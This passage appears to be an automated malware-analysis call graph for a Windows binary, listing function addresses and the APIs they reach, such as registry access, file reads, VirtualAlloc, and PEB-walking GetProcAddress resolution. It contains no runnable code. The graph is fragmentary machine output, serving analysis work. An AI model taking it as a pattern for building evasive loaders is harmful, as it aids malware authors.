402bab GetProcessHeap HeapFree 8630->8633 8631 4059d8 4 API calls 8631->8633 8632 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8632->8633 8633->8627 8633->8628 8633->8630 8633->8631 8633->8632 8635 4031e5 4 API calls 8634->8635 8636 406441 GetNativeSystemInfo 8635->8636 8636->8491 8638 4031e5 4 API calls 8637->8638 8639 40480a 8638->8639 8640 4031e5 4 API calls 8639->8640 8642 40485d 8639->8642 8643 40484f 8639->8643 8640->8639 8641 403c40 5 API calls 8641->8642 8642->8492 8642->8495 8643->8641 8645 4031e5 4 API calls 8644->8645 8646 40a435 8645->8646 8646->8510 8648 4031e5 4 API calls 8647->8648 8649 40a451 8648->8649 8649->8524 8651 4031e5 4 API calls 8650->8651 8652 40487c 8651->8652 8652->8594 8653 406c4c 8652->8653 8714 4068eb 8653->8714 8655 406e02 8655->8598 8656 406cab 8726 40469b 8656->8726 8657 406c6c 8657->8655 8657->8656 8723 406894 8657->8723 8664 406df1 8665 40469b 4 API calls 8664->8665 8665->8655 8666 406cef 8666->8664 8667 4031e5 4 API calls 8666->8667 8668 406d26 8667->8668 8668->8664 8669 40771e 6 API calls 8668->8669 8673 406d57 8669->8673 8670 406da2 8671 4031e5 4 API calls 8670->8671 8671->8664 8673->8670 8739 4068b0 8673->8739 8675 4126bb 8674->8675 8676 4126d1 8674->8676 8683 412840 8675->8683 8795 40488c 8675->8795 8676->8683 8801 407055 8676->8801 8680 412837 8682 403c40 5 API calls 8680->8682 8682->8683 8683->8594 8685 41281e 8686 4070ff 6 API calls 8685->8686 8686->8680 8687 407055 6 API calls 8688 412742 8687->8688 8688->8685 8689 40719a 6 API calls 8688->8689 8690 41276e 8689->8690 8691 412804 8690->8691 8817 406f4a 8690->8817 8845 4070ff 8691->8845 8694 41279a 8823 412553 8694->8823 8867 405907 8704->8867 8706 405a61 8707 405a76 8706->8707 8708 405907 4 API calls 8706->8708 8707->8523 8708->8706 8710 402b7c 2 API calls 8709->8710 8712 405a99 8710->8712 8711 405ade 8711->8541 8712->8711 8870 40595e 8712->8870 8742 4076a8 8714->8742 8716 406913 8717 406a61 8716->8717 8718 40771e 6 API calls 8716->8718 8717->8657 8722 406949 8718->8722 8719 40771e 6 API calls 8719->8722 8720 404678 4 API calls 8720->8722 8722->8717 8722->8719 8722->8720 8748 4046c2 8722->8748 8724 4031e5 4 API calls 8723->8724 8725 4068a6 8724->8725 8725->8657 8727 4046b4 8726->8727 8728 4046a4 8726->8728 8727->8655 8730 404678 8727->8730 8729 4031e5 4 API calls 8728->8729 8729->8727 8731 4031e5 4 API calls 8730->8731 8732 40468b 8731->8732 8732->8655 8733 40771e 8732->8733 8734 407737 8733->8734 8737 407748 8733->8737 8735 407644 6 API calls 8734->8735 8736 407741 8735->8736 8738 406baa 6 API calls 8736->8738 8737->8666 8738->8737 8740 4031e5 4 API calls 8739->8740 8741 4068c2 8740->8741 8741->8673 8743 4076c1 8742->8743 8747 4076d2 8742->8747 8756 407644 8743->8756 8747->8716 8749 4046d3 8748->8749 8750 4046d9 8748->8750 8791 40464c 8749->8791 8752 4046e9 8750->8752 8754 404678 4 API calls 8750->8754 8753 404714 8752->8753 8755 40469b 4 API calls 8752->8755 8753->8722 8754->8752 8755->8753 8757 407653 8756->8757 8758 407661 8756->8758 8757->8758 8764 406a6b 8757->8764 8760 406baa 8758->8760 8761 406bbb 8760->8761 8763 406bc8 8760->8763 8761->8763 8772 407402 8761->8772 8763->8747 8765 406a81 8764->8765 8766 402b7c 2 API calls 8765->8766 8767 406b8b 8765->8767 8768 406894 4 API calls 8765->8768 8769 406b96 8765->8769 8771 402bab 2 API calls 8765->8771 8766->8765 8767->8758 8768->8765 8770 402bab 2 API calls 8769->8770 8770->8767 8771->8765 8773 407644 6 API calls 8772->8773 8774 407412 8773->8774 8775 402b7c 2 API calls 8774->8775 8782 407450 8774->8782 8776 407483 8775->8776 8777 402b7c 2 API calls 8776->8777 8776->8782 8779 4074ce 8777->8779 8778 4074da 8780 4068cc 2 API calls 8778->8780 8779->8778 8781 402b7c 2 API calls 8779->8781 8780->8782 8785 40751f 8781->8785 8782->8763 8783 40752b 8784 4068cc 2 API calls 8783->8784 8784->8778 8785->8783 8787 4068cc 8785->8787 8788 4068d6 8787->8788 8789 4068e3 8787->8789 8788->8789 8790 402bab GetProcessHeap HeapFree 8788->8790 8789->8783 8790->8789 8792 404666 8791->8792 8793 404659 8791->8793 8792->8750 8794 4031e5 4 API calls 8793->8794 8794->8792 8796 4047e6 5 API calls 8795->8796 8797 404897 8796->8797 8798 40489c 8797->8798 8853 4047c7 8797->8853 8798->8676 8802 40706f 8801->8802 8803 407084 8801->8803 8802->8803 8804 407644 6 API calls 8802->8804 8808 4070e4 8803->8808 8856 406fd2 8803->8856 8805 40707d 8804->8805 8807 406baa 6 API calls 8805->8807 8807->8803 8808->8680 8809 40719a 8808->8809 8810 4071b0 8809->8810 8812 4071c5 8809->8812 8811 407644 6 API calls 8810->8811 8810->8812 8813 4071be 8811->8813 8815 406fd2 4 API calls 8812->8815 8816 407226 8812->8816 8814 406baa 6 API calls 8813->8814 8814->8812 8815->8816 8816->8685 8816->8687 8818 406f64 8817->8818 8822 406f75 8817->8822 8819 407644 6 API calls 8818->8819 8820 406f6e 8819->8820 8821 406baa 6 API calls 8820->8821 8821->8822 8822->8694 8864 4060ac 8823->8864 8846 407116 8845->8846 8848 40712b 8845->8848 8847 407644 6 API calls 8846->8847 8846->8848 8849 407124 8847->8849 8850 406fd2 4 API calls 8848->8850 8852 407187 8848->8852 8851 406baa 6 API calls 8849->8851 8850->8852 8851->8848 8852->8685 8854 4031e5 4 API calls 8853->8854 8855 4047d9 8854->8855 8855->8676 8857 406fde 8856->8857 8858 407027 8857->8858 8859 4031e5 4 API calls 8857->8859 8858->8808 8860 406ffa 8859->8860 8861 4031e5 4 API calls 8860->8861 8862 407011 8861->8862 8863 4031e5 4 API calls 8862->8863 8863->8858 8865 4031e5 4 API calls 8864->8865 8866 4060bb 8865->8866 8866->8866 8868 4031e5 4 API calls 8867->8868 8869 40591a 8868->8869 8869->8706 8871 4031e5 4 API calls 8870->8871 8872 405971 8871->8872 8872->8712 8874 4031e5 4 API calls 8873->8874 8875 4059ed 8874->8875 8876 402b7c 2 API calls 8875->8876 8877 405a38 8875->8877 8878 405a16 8876->8878 8877->8624 8878->8877 8879 4031e5 4 API calls 8878->8879 8879->8877 8881 4031e5 4 API calls 8880->8881 8882 4044b9 8881->8882 8882->8481 9802 40a349 9803 4098a7 13 API calls 9802->9803 9804 40a359 9803->9804 9041 408952 9062 40823f 9041->9062 9044 408960 9046 4056bf 2 API calls 9044->9046 9047 40896a 9046->9047 9090 408862 9047->9090 9049 413aca 4 API calls 9050 4089d4 9049->9050 9052 405695 2 API calls 9050->9052 9051 408975 9059 4089c4 9051->9059 9098 4087d6 9051->9098 9054 4089df 9052->9054 9059->9049 9060 402bab 2 API calls 9061 40899d 9060->9061 9061->9059 9061->9060 9063 40824d 9062->9063 9064 40831b 9063->9064 9065 4031e5 4 API calls 9063->9065 9064->9044 9078 4083bb 9064->9078 9066 40826d 9065->9066 9067 4031e5 4 API calls 9066->9067 9068 408289 9067->9068 9069 4031e5 4 API calls 9068->9069 9070 4082a5 9069->9070 9071 4031e5 4 API calls 9070->9071 9072 4082c1 9071->9072 9073 4031e5 4 API calls 9072->9073 9074 4082e2 9073->9074 9075 4031e5 4 API calls 9074->9075 9076 4082ff 9075->9076 9077 4031e5 4 API calls 9076->9077 9077->9064 9126 408363 9078->9126 9081 4084ab 9081->9044 9082 4056bf 2 API calls 9087 4083f4 9082->9087 9083 408492 9084 413aca 4 API calls 9083->9084 9085 4084a0 9084->9085 9086 405695 2 API calls 9085->9086 9086->9081 9087->9083 9129 40815d 9087->9129 9144 40805d 9087->9144 9159 404b8f 9090->9159 9092 408946 9092->9051 9093 40887e 9093->9092 9094 4031e5 4 API calls 9093->9094 9095 40893e 9093->9095 9097 402b7c 2 API calls 9093->9097 9094->9093 9162 404a39 9095->9162 9097->9093 9099 402b7c 2 API calls 9098->9099 9100 4087e7 9099->9100 9101 40885a 9100->9101 9102 4031e5 4 API calls 9100->9102 9110 408749 9101->9110 9103 408802 9102->9103 9106 40884d 9103->9106 9109 408853 9103->9109 9171 408522 9103->9171 9175 4084b4 9103->9175 9104 402bab 2 API calls 9104->9101 9178 4084d4 9106->9178 9109->9104 9111 404b8f 5 API calls 9110->9111 9113 408765 9111->9113 9112 4031e5 4 API calls 9112->9113 9113->9112 9114 408522 4 API calls 9113->9114 9115 4087c7 9113->9115 9117 4087cf 9113->9117 9114->9113 9116 404a39 5 API calls 9115->9116 9116->9117 9118 4085d1 9117->9118 9119 4086c2 9118->9119 9121 4085e9 9118->9121 9119->9061 9121->9119 9122 402bab 2 API calls 9121->9122 9123 4031e5 4 API calls 9121->9123 9184 4089e6 9121->9184 9203 4086c9 9121->9203 9207 4036a3 9121->9207 9122->9121 9123->9121 9127 4031e5 4 API calls 9126->9127 9128 408386 9127->9128 9128->9081 9128->9082 9130 40816f 9129->9130 9131 4081b6 9130->9131 9132 4081fd 9130->9132 9143 4081ef 9130->9143 9134 405872 4 API calls 9131->9134 9133 405872 4 API calls 9132->9133 9135 408213 9133->9135 9136 4081cf 9134->9136 9137 405872 4 API calls 9135->9137 9138 405872 4 API calls 9136->9138 9139 408222 9137->9139 9140 4081df 9138->9140 9141 405872 4 API calls 9139->9141 9142 405872 4 API calls 9140->9142 9141->9143 9142->9143 9143->9087 9145 40808c 9144->9145 9146 4080d2 9145->9146 9147 408119 9145->9147 9158 40810b 9145->9158 9149 405872 4 API calls 9146->9149 9148 405872 4 API calls 9147->9148 9150 40812f 9148->9150 9151 4080eb 9149->9151 9153 405872 4 API calls 9150->9153 9152 405872 4 API calls 9151->9152 9154 4080fb 9152->9154 9155 40813e 9153->9155 9156 405872 4 API calls 9154->9156 9157 405872 4 API calls 9155->9157 9156->9158 9157->9158 9158->9087 9165 404a19 9159->9165 9161 404ba0 9161->9093 9168 4049ff 9162->9168 9164 404a44 9164->9092 9166 4031e5 4 API calls 9165->9166 9167 404a2c RegOpenKeyW 9166->9167 9167->9161 9169 4031e5 4 API calls 9168->9169 9170 404a12 RegCloseKey 9169->9170 9170->9164 9173 408534 9171->9173 9172 4085af 9172->9103 9173->9172 9181 4084ee 9173->9181 9176 4031e5 4 API calls 9175->9176 9177 4084c7 9176->9177 9177->9103 9179 4031e5 4 API calls 9178->9179 9180 4084e7 9179->9180 9180->9109 9182 4031e5 4 API calls 9181->9182 9183 408501 9182->9183 9183->9172 9185 4031e5 4 API calls 9184->9185 9186 408a06 9185->9186 9187 408b21 9186->9187 9188 4031e5 4 API calls 9186->9188 9187->9121 9191 408a32 9188->9191 9189 408b17 9219 403649 9189->9219 9191->9189 9210 403666 9191->9210 9194 4031e5 4 API calls 9196 408a88 9194->9196 9197 4031e5 4 API calls 9196->9197 9202 408b0e 9196->9202 9198 408ac4 9197->9198 9199 405b6f 6 API calls 9198->9199 9200 408aff 9199->9200 9200->9202 9213 408508 9200->9213 9216 40362f 9202->9216 9204 408744 9203->9204 9206 4086e2 9203->9206 9204->9121 9205 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9205->9206 9206->9204 9206->9205 9208 4031e5 4 API calls 9207->9208 9209 4036b5 9208->9209 9209->9121 9211 4031e5 4 API calls 9210->9211 9212 403679 9211->9212 9212->9194 9212->9202 9214 4031e5 4 API calls 9213->9214 9215 40851b 9214->9215 9215->9202 9217 4031e5 4 API calls 9216->9217 9218 403642 9217->9218 9218->9189 9220 4031e5 4 API calls 9219->9220 9221 40365c 9220->9221 9221->9187 9822 40f252 9823 404bee 6 API calls 9822->9823 9824 40f269 9823->9824 9825 404bee 6 API calls 9824->9825 9836 40f2ff 9824->9836 9826 40f282 9825->9826 9827 404bee 6 API calls 9826->9827 9828 40f290 9827->9828 9839 404c4e 9828->9839 9830 40f2a7 9831 405872 4 API calls 9830->9831 9830->9836 9832 40f2cd 9831->9832 9833 405872 4 API calls 9832->9833 9834 40f2dc 9833->9834 9835 405872 4 API calls 9834->9835 9837 40f2ee 9835->9837 9838 405762 4 API calls 9837->9838 9838->9836 9840 402b7c 2 API calls 9839->9840 9842 404c60 9840->9842 9841 404ca4 9841->9830 9842->9841 9843 4031e5 4 API calls 9842->9843 9844 404c8d 9843->9844 9844->9841 9845 402bab 2 API calls 9844->9845 9845->9841 9846 41045c 9847 4040bb 12 API calls 9846->9847 9848 410477 9847->9848 9849 41060b 9848->9849 9877 407851 9848->9877 9851 41048f 9853 407851 2 API calls 9851->9853 9857 410604 9851->9857 9852 403f9e 5 API calls 9852->9849 9854 4104a9 9853->9854 9859 4105e0 9854->9859 9860 405ae9 6 API calls 9854->9860 9862 41056f 9854->9862 9863 4105eb 9854->9863 9855 402bab 2 API calls 9855->9857 9856 402bab 2 API calls 9858 4105fb 9856->9858 9857->9852 9858->9855 9861 402bab 2 API calls 9859->9861 9859->9863 9860->9854 9861->9863 9862->9859 9864 4105d6 9862->9864 9866 412269 6 API calls 9862->9866 9863->9856 9863->9858 9865 402bab 2 API calls 9864->9865 9865->9859 9867 410580 9866->9867 9867->9864 9868 405872 4 API calls 9867->9868 9869 410599 9868->9869 9870 405872 4 API calls 9869->9870 9871 4105a9 9870->9871 9872 405872 4 API calls 9871->9872 9873 4105bb 9872->9873 9874 405872 4 API calls 9873->9874 9875 4105cd 9874->9875 9876 402bab 2 API calls 9875->9876 9876->9864 9878 407866 9877->9878 9879 402b7c 2 API calls 9878->9879 9880 407899 9878->9880 9879->9880 9880->9851 9283 40f561 9286 40f4b6 9283->9286 9287 413b28 6 API calls 9286->9287 9288 40f4bf 9287->9288 9289 405b6f 6 API calls 9288->9289 9290 40f559 9288->9290 9291 413a58 13 API calls 9288->9291 9292 402bab GetProcessHeap HeapFree 9288->9292 9289->9288 9291->9288 9292->9288 9296 403b64 9297 4031e5 4 API calls 9296->9297 9298 403b77 PathFileExistsW 9297->9298 9912 40d069 9913 404bee 6 API calls 9912->9913 9914 40d080 9913->9914 9915 404bee 6 API calls 9914->9915 9937 40d1e2 9914->9937 9916 40d099 9915->9916 9917 404bee 6 API calls 9916->9917 9918 40d0a7 9917->9918 9953 404ba7 9918->9953 9921 404bee 6 API calls 9922 40d0c5 9921->9922 9923 404c4e 6 API calls 9922->9923 9924 40d0dc 9923->9924 9925 404bee 6 API calls 9924->9925 9926 40d0eb 9925->9926 9927 404ba7 4 API calls 9926->9927 9928 40d0fa 9927->9928 9929 404bee 6 API calls 9928->9929 9930 40d109 9929->9930 9931 404c4e 6 API calls 9930->9931 9932 40d123 9931->9932 9933 405872 4 API calls 9932->9933 9932->9937 9934 40d14a 9933->9934 9935 405872 4 API calls 9934->9935 9936 40d159 9935->9936 9938 405872 4 API calls 9936->9938 9939 40d16b 9938->9939 9940 405781 4 API calls 9939->9940 9941 40d179 9940->9941 9942 405872 4 API calls 9941->9942 9943 40d18b 9942->9943 9944 405762 4 API calls 9943->9944 9945 40d19f 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d1b1 9946->9947 9948 405781 4 API calls 9947->9948 9949 40d1bf 9948->9949 9950 405872 4 API calls 9949->9950 9951 40d1d1 9950->9951 9952 405762 4 API calls 9951->9952 9952->9937 9954 4031e5 4 API calls 9953->9954 9955 404bca 9954->9955 9955->9921 9325 40f16e 9326 4056bf 2 API calls 9325->9326 9327 40f17b 9326->9327 9328 412093 20 API calls 9327->9328 9329 40f19e 9328->9329 9330 412093 20 API calls 9329->9330 9331 40f1b6 9330->9331 9332 412093 20 API calls 9331->9332 9333 40f1cc 9332->9333 9334 412093 20 API calls 9333->9334 9335 40f1e2 9334->9335 9336 413aca 4 API calls 9335->9336 9337 40f1ef 9336->9337 9338 405695 2 API calls 9337->9338 9339 40f1fa 9338->9339 9340 40ce71 9341 413b28 6 API calls 9340->9341 9342 40ce78 9341->9342 9343 405b6f 6 API calls 9342->9343 9345 40ce83 9343->9345 9344 403fbf 7 API calls 9346 40cecc 9344->9346 9348 403d74 19 API calls 9345->9348 9352 40cec1 9345->9352 9358 40ceba 9345->9358 9347 403d74 19 API calls 9346->9347 9357 40cefb 9346->9357 9350 40cee7 9347->9350 9351 40cead 9348->9351 9349 402bab 2 API calls 9349->9352 9353 40cef4 9350->9353 9354 402bab 2 API calls 9350->9354 9356 402bab 2 API calls 9351->9356 9351->9358 9352->9344 9355 402bab 2 API calls 9353->9355 9354->9353 9355->9357 9356->9358 9358->9349 9359 406472 9360 4031e5 4 API calls 9359->9360 9361 406484 Sleep 9360->9361 10029 40f204 10030 405781 4 API calls 10029->10030 10031 40f214 10030->10031 10032 4057df 13 API calls 10031->10032 10033 40f226 10032->10033 9419 403c08 9420 4031e5 4 API calls 9419->9420 9421 403c1a DeleteFileW 9420->9421 9422 410a09 9423 41219c 14 API calls 9422->9423 9424 410a1b 9423->9424 9425 41219c 14 API calls 9424->9425 9426 410a23 9425->9426 9427 41219c 14 API calls 9426->9427 9428 410a2c 9427->9428 9429 41219c 14 API calls 9428->9429 9430 410a38 9429->9430 9431 404b22 6 API calls 9430->9431 9432 410a4c 9431->9432 9433 403fbf 7 API calls 9432->9433 9438 410a7a 9432->9438 9434 410a5c 9433->9434 9435 413a58 13 API calls 9434->9435 9440 410a71 9434->9440 9437 410a6b 9435->9437 9436 402bab 2 API calls 9436->9438 9439 402bab 2 API calls 9437->9439 9439->9440 9440->9436 10034 410d09 10035 410d56 10034->10035 10036 410d17 10034->10036 10037 413a58 13 API calls 10035->10037 10050 406642 10036->10050 10040 410d6f 10037->10040 10041 4056bf 2 API calls 10042 410d2e 10041->10042 10063 405641 10042->10063 10044 410d41 10045 413aca 4 API calls 10044->10045 10046 410d4a 10045->10046 10047 405695 2 API calls 10046->10047 10048 410d50 10047->10048 10049 4036a3 4 API calls 10048->10049 10049->10035 10051 406662 10050->10051 10052 4031e5 4 API calls 10051->10052 10053 406676 10052->10053 10067 4066bf 10053->10067 10058 4066b1 10061 4036a3 4 API calls 10058->10061 10059 4066a7 10060 4036a3 4 API calls 10059->10060 10062 4066ac 10060->10062 10061->10062 10062->10035 10062->10041 10064 40564d 10063->10064 10065 405673 10063->10065 10064->10065 10066 4056fc 4 API calls 10064->10066 10065->10044 10066->10065 10068 4031e5 4 API calls 10067->10068 10069 4066dc 10068->10069 10070 4066f6 SetLastError 10069->10070 10071 406708 GetLastError 10069->10071 10072 406693 10070->10072 10071->10072 10073 406713 10071->10073 10089 406455 10072->10089 10074 4031e5 4 API calls 10073->10074 10075 406725 10074->10075 10075->10072 10076 4031e5 4 API calls 10075->10076 10077 40673f 10076->10077 10078 406753 10077->10078 10079 406749 10077->10079 10081 4031e5 4 API calls 10078->10081 10080 4036a3 4 API calls 10079->10080 10080->10072 10082 406761 10081->10082 10083 40678a 10082->10083 10084 40677c 10082->10084 10086 4036a3 4 API calls 10083->10086 10085 4036a3 4 API calls 10084->10085 10087 406781 10085->10087 10086->10072 10088 4036a3 4 API calls 10087->10088 10088->10072 10090 4031e5 4 API calls 10089->10090 10091 406468 10090->10091 10091->10058 10091->10059 9441 40c509 9442 412093 20 API calls 9441->9442 9443 40c51e 9442->9443 9450 40910d 9451 404b22 6 API calls 9450->9451 9452 409124 9451->9452 9453 40917a 9452->9453 9454 405b6f 6 API calls 9452->9454 9455 40913e 9454->9455 9456 409173 9455->9456 9457 404b22 6 API calls 9455->9457 9458 402bab 2 API calls 9456->9458 9459 409153 9457->9459 9458->9453 9460 40916a 9459->9460 9461 409408 15 API calls 9459->9461 9462 402bab 2 API calls 9460->9462 9463 409164 9461->9463 9462->9456 9464 402bab 2 API calls 9463->9464 9464->9460 9468 410410 9469 4056bf 2 API calls 9468->9469 9470 41041b 9469->9470 9471 412093 20 API calls 9470->9471 9472 41043c 9471->9472 9473 413aca 4 API calls 9472->9473 9474 410449 9473->9474 9475 405695 2 API calls 9474->9475 9476 410454 9475->9476 9503 40c71a 9504 41219c 14 API calls 9503->9504 9505 40c728 9504->9505 10147 410b1a 10148 404bee 6 API calls 10147->10148 10149 410b31 10148->10149 10150 404bee 6 API calls 10149->10150 10160 410c6d 10149->10160 10151 410b5a 10150->10151 10152 404bee 6 API calls 10151->10152 10153 410b69 10152->10153 10154 404bee 6 API calls 10153->10154 10155 410b78 10154->10155 10156 404ba7 4 API calls 10155->10156 10157 410b86 10156->10157 10158 404ba7 4 API calls 10157->10158 10159 410b95 10158->10159 10159->10160 10161 405872 4 API calls 10159->10161 10162 410bd7 10161->10162 10163 405872 4 API calls 10162->10163 10164 410be8 10163->10164 10165 405872 4 API calls 10164->10165 10166 410bf9 10165->10166 10167 405781 4 API calls 10166->10167 10168 410c07 10167->10168 10169 405781 4 API calls 10168->10169 10173 410c15 10169->10173 10170 410c4e 10171 405762 4 API calls 10170->10171 10172 410c60 10171->10172 10172->10160 10175 403f9e 5 API calls 10172->10175 10173->10170 10180 405e5a 10173->10180 10175->10160 10177 4040bb 12 API calls 10178 410c44 10177->10178 10179 402bab 2 API calls 10178->10179 10179->10170 10181 402b7c 2 API calls 10180->10181 10182 405e72 10181->10182 10183 4031e5 4 API calls 10182->10183 10185 405ea3 10182->10185 10184 405e94 10183->10184 10184->10185 10186 402bab 2 API calls 10184->10186 10185->10170 10185->10177 10186->10185 10187 40f81c 10188 404bee 6 API calls 10187->10188 10190 40f833 10188->10190 10189 40f94f 10190->10189 10191 404bee 6 API calls 10190->10191 10192 40f85c 10191->10192 10193 404bee 6 API calls 10192->10193 10194 40f86b 10193->10194 10195 404bee 6 API calls 10194->10195 10196 40f87a 10195->10196 10197 404bee 6 API calls 10196->10197 10198 40f888 10197->10198 10199 404ba7 4 API calls 10198->10199 10200 40f897 10199->10200 10200->10189 10201 405872 4 API calls 10200->10201 10202 40f8d8 10201->10202 10203 405872 4 API calls 10202->10203 10204 40f8ea 10203->10204 10205 405872 4 API calls 10204->10205 10206 40f8fa 10205->10206 10207 405872 4 API calls 10206->10207 10208 40f90c 10207->10208 10209 405781 4 API calls 10208->10209 10210 40f91d 10209->10210 10211 4040bb 12 API calls 10210->10211 10212 40f92d 10211->10212 10213 405762 4 API calls 10212->10213 10214 40f93f 10213->10214 10214->10189 10215 403f9e 5 API calls 10214->10215 10215->10189 9518 402c1f 9519 4031e5 4 API calls 9518->9519 9520 402c31 LoadLibraryW 9519->9520 10225 407e1f 10226 407e61 10225->10226 10227 407e2c 10225->10227 10229 407ea6 10226->10229 10233 407eb6 10226->10233 10237 405872 4 API calls 10226->10237 10230 402bab 2 API calls 10227->10230 10231 407e3e 10227->10231 10235 407e51 10227->10235 10228 407ed4 10232 402bab 2 API calls 10229->10232 10229->10233 10230->10231 10231->10228 10236 402bab 2 API calls 10231->10236 10232->10233 10234 402bab 2 API calls 10233->10234 10233->10235 10234->10235 10235->10228 10238 402bab 2 API calls 10235->10238 10236->10235 10239 407e86 10237->10239 10238->10228 10240 405872 4 API calls 10239->10240 10241 407e96 10240->10241 10242 405872 4 API calls 10241->10242 10242->10229 9533 405924 9534 4031e5 4 API calls 9533->9534 9535 405937 StrStrW 9534->9535 10251 410927 10252 4044ee 7 API calls 10251->10252 10253 41093d 10252->10253 10254 4109a4 10253->10254 10255 4056bf 2 API calls 10253->10255 10258 410954 10255->10258 10256 4044ee 7 API calls 10256->10258 10258->10256 10259 402bab 2 API calls 10258->10259 10260 410990 10258->10260 10266 41080e 10258->10266 10259->10258 10261 413aca 4 API calls 10260->10261 10262 410998 10261->10262 10263 405695 2 API calls 10262->10263 10264 41099e 10263->10264 10265 402bab 2 API calls 10264->10265 10265->10254 10267 410821 10266->10267 10277 41091f 10267->10277 10278 410701 10267->10278 10270 405872 4 API calls 10271 410900 10270->10271 10272 405872 4 API calls 10271->10272 10273 41090d 10272->10273 10274 405872 4 API calls 10273->10274 10275 410919 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10277 10277->10258 10279 405f08 4 API calls 10278->10279 10281 410713 10279->10281 10280 410804 10280->10270 10280->10277 10281->10280 10282 402b7c 2 API calls 10281->10282 10286 410748 10282->10286 10283 4107fd 10284 402bab 2 API calls 10283->10284 10284->10280 10285 402b7c 2 API calls 10288 4107ad 10285->10288 10286->10283 10286->10285 10287 402bab 2 API calls 10287->10283 10288->10287 10289 40d726 10290 404bee 6 API calls 10289->10290 10291 40d73f 10290->10291 10292 405872 4 API calls 10291->10292 10304 40db63 10291->10304 10295 40d761 10292->10295 10293 404bee 6 API calls 10293->10295 10294 405872 4 API calls 10294->10295 10295->10293 10295->10294 10297 40d971 10295->10297 10296 404ba7 4 API calls 10296->10297 10297->10296 10298 405781 4 API calls 10297->10298 10303 40d9bb 10297->10303 10298->10297 10299 404c4e 6 API calls 10299->10303 10300 405781 4 API calls 10300->10303 10301 4037be 4 API calls 10301->10303 10302 405872 4 API calls 10302->10303 10303->10299 10303->10300 10303->10301 10303->10302 10303->10304 9591 40f12f 9592 41219c 14 API calls 9591->9592 9593 40f13f 9592->9593 9594 41219c 14 API calls 9593->9594 9595 40f14c 9594->9595 9596 41219c 14 API calls 9595->9596 9597 40f159 9596->9597 9598 41219c 14 API calls 9597->9598 9599 40f166 9598->9599 9606 40ed35 9607 4056bf 2 API calls 9606->9607 9608 40ed42 9607->9608 9609 412093 20 API calls 9608->9609 9610 40ed63 9609->9610 9611 412093 20 API calls 9610->9611 9612 40ed73 9611->9612 9613 413aca 4 API calls 9612->9613 9614 40ed80 9613->9614 9615 405695 2 API calls 9614->9615 9616 40ed8e 9615->9616 8060 40f3c5 8065 41219c 8060->8065 8063 41219c 14 API calls 8064 40f3e1 8063->8064 8066 4121b1 8065->8066 8082 40f3d3 8065->8082 8067 4121be 8066->8067 8071 4121c5 8066->8071 8113 413ba4 8067->8113 8069 4121ca 8083 404056 8069->8083 8071->8069 8075 412210 8071->8075 8072 4121c3 8072->8082 8090 405b6f 8072->8090 8075->8082 8118 403fbf 8075->8118 8076 41224d 8079 402bab 2 API calls 8076->8079 8076->8082 8079->8082 8082->8063 8129 402b7c GetProcessHeap RtlAllocateHeap 8083->8129 8085 404066 8087 404095 8085->8087 8131 4031e5 8085->8131 8087->8072 8089 402bab 2 API calls 8089->8087 8091 405b7d 8090->8091 8092 402b7c 2 API calls 8091->8092 8093 405b99 8092->8093 8099 405c02 8093->8099 8167 4059b8 8093->8167 8095 405c09 8097 402bab 2 API calls 8095->8097 8096 405bba 8096->8095 8098 402b7c 2 API calls 8096->8098 8097->8099 8100 405bdd 8098->8100 8099->8076 8103 413a58 8099->8103 8100->8095 8101 405be4 8100->8101 8102 402bab 2 API calls 8101->8102 8102->8099 8104 413a63 8103->8104 8112 412245 8103->8112 8104->8112 8170 405781 8104->8170 8107 405781 4 API calls 8108 413aa0 8107->8108 8173 4057df 8108->8173 8111 405781 4 API calls 8111->8112 8126 402bab 8112->8126 8114 413bad 8113->8114 8115 404056 6 API calls 8114->8115 8117 413bb8 8114->8117 8116 413bc5 8115->8116 8116->8072 8117->8072 8119 402b7c 2 API calls 8118->8119 8121 403fcf 8119->8121 8120 403ff4 8120->8072 8121->8120 8292 403b98 8121->8292 8124 403ff8 GetLastError 8125 402bab 2 API calls 8124->8125 8125->8120 8127 402bb4 GetProcessHeap HeapFree 8126->8127 8128 402bc6 8126->8128 8127->8128 8128->8076 8130 402b98 8129->8130 8130->8085 8132 4031f3 8131->8132 8133 403236 8131->8133 8132->8133 8136 403208 8132->8136 8142 4030a5 8133->8142 8135 403224 8137 403258 8135->8137 8139 4031e5 4 API calls 8135->8139 8148 403263 8136->8148 8137->8087 8137->8089 8139->8137 8140 40320d 8140->8137 8141 4030a5 4 API calls 8140->8141 8141->8135 8154 402ca4 8142->8154 8144 4030b0 8145 4030b5 8144->8145 8158 4030c4 8144->8158 8145->8135 8149 40326d 8148->8149 8150 402b7c 2 API calls 8149->8150 8153 4032b7 8149->8153 8151 40328c 8150->8151 8152 402b7c 2 API calls 8151->8152 8152->8153 8153->8140 8155 403079 8154->8155 8156 40307c 8155->8156 8162 40317b GetPEB 8155->8162 8156->8144 8161 4030eb 8158->8161 8159 4030c0 8159->8135 8161->8159 8164 402c03 8161->8164 8163 40319b 8162->8163 8163->8156 8165 4031e5 3 API calls 8164->8165 8166 402c15 GetProcAddress 8165->8166 8166->8159 8168 4031e5 4 API calls 8167->8168 8169 4059cb 8168->8169 8169->8096 8188 405797 8170->8188 8172 405792 8172->8107 8174 4057eb 8173->8174 8187 405832 8173->8187 8174->8187 8198 4040bb 8174->8198 8177 405839 8179 405853 8177->8179 8225 405627 8177->8225 8178 40582c 8222 403f9e 8178->8222 8236 405762 8179->8236 8185 403f9e 5 API calls 8185->8187 8187->8111 8187->8112 8189 4057a1 8188->8189 8190 4057bd 8188->8190 8189->8190 8192 4056fc 8189->8192 8190->8172 8193 405714 8192->8193 8194 402b7c 2 API calls 8193->8194 8196 405730 8194->8196 8195 405752 8195->8190 8196->8195 8197 402bab 2 API calls 8196->8197 8197->8195 8199 4031e5 4 API calls 8198->8199 8200 4040d5 CreateFileW 8199->8200 8201 4040f8 8200->8201 8202 40418d 8200->8202 8204 4031e5 4 API calls 8201->8204 8203 404183 8202->8203 8242 403c90 8202->8242 8203->8177 8203->8178 8203->8187 8209 404105 8204->8209 8207 40416d 8239 403c40 8207->8239 8209->8207 8213 4031e5 4 API calls 8209->8213 8212 402bab 2 API calls 8212->8203 8215 404131 VirtualAlloc 8213->8215 8214 4040bb 9 API calls 8216 4041c8 8214->8216 8215->8207 8217 404142 8215->8217 8216->8212 8218 4031e5 4 API calls 8217->8218 8219 40414f ReadFile 8218->8219 8219->8207 8220 404160 8219->8220 8221 4031e5 4 API calls 8220->8221 